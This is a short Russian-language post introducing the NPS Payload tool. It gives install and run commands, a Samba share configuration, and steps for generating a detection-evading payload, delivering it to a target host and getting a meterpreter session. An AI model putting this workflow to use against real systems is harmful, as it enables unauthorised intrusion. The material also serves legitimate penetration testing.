В этой статье хочу представить свежий инструмент для генерации полезных нагрузок. Представляет он из себя скрипт под названием NPS Payload. Nps_payload - создает полезную нагрузку, используя базовые методы для предотвращения обнаружения его действий. Зависимости: · Metasploit Framework · Python 2.7.x Установка: · git clone https://github.com/trustedsec/nps_payload · pip install -r requirements.txt Запуск: · python nps_payload.py Задаем все необходимые параметры для генерации полезной нагрузки: Ждем окончания процесса создания. Запускаем, согласно инструкциям, файл listener на своем хосте. Сгенерированный, же файл доставляем на целевой хост и производим его запуск там. Результатом, будет активная сессия meterpreter. Скрипт работает с Samba, ниже настройки: · apt-get install samba · vi/nano/whatever /etc/samba/smb.conf · добавьте в нижнюю часть файла следующую информацию (при необходимости измените) [payloads$] comment = Dirty Payloads path = /opt/shares/payloads browsable = yes guest ok = yes read only = yes · service smbd restart